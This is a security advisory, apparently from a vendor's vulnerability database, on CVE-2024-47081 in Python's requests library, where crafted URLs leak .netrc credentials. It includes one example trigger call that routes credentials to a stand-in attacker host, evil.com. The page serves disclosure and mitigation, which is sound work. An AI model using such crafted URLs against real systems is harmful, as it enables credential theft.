CVE-2024-47081
Linux Debian vulnerability analysis and mitigation

Overview

The PSF requests library (Python) contains a vulnerability (CVE-2024-47081) that leaks .netrc credentials to third parties due to incorrect URL processing. The vulnerability was initially reported to library maintainers on September 12, 2024. When making specific API calls with a specially crafted URL format, the library can expose sensitive credentials to unintended destinations (Openwall).

Technical details

The vulnerability is triggered when making API calls in the format requests.get('http://example.com:@evil.com/'). If .netrc credentials are configured for example.com, they are leaked to evil.com. The root cause is identified in the code at https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245 (Openwall).

Impact

When exploited, this vulnerability leads to the exposure of sensitive .netrc credentials to potentially malicious third-party servers, which could result in unauthorized access to various services using the leaked credentials (Openwall).

Mitigation and workarounds

As a workaround, users can explicitly specify credentials on every API call to disable .netrc access. No permanent fix is available as of the vulnerability disclosure (Openwall).

Additional resources


SourceThis report was generated using AI

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

“Best User Experience I have ever seen, provides full visibility to cloud workloads.”
David EstlickCISO
“Wiz provides a single pane of glass to see what is going on in our cloud environments.”
Adam FletcherChief Security Officer
“We know that if Wiz identifies something as critical, it actually is.”
Greg PoniatowskiHead of Threat and Vulnerability Management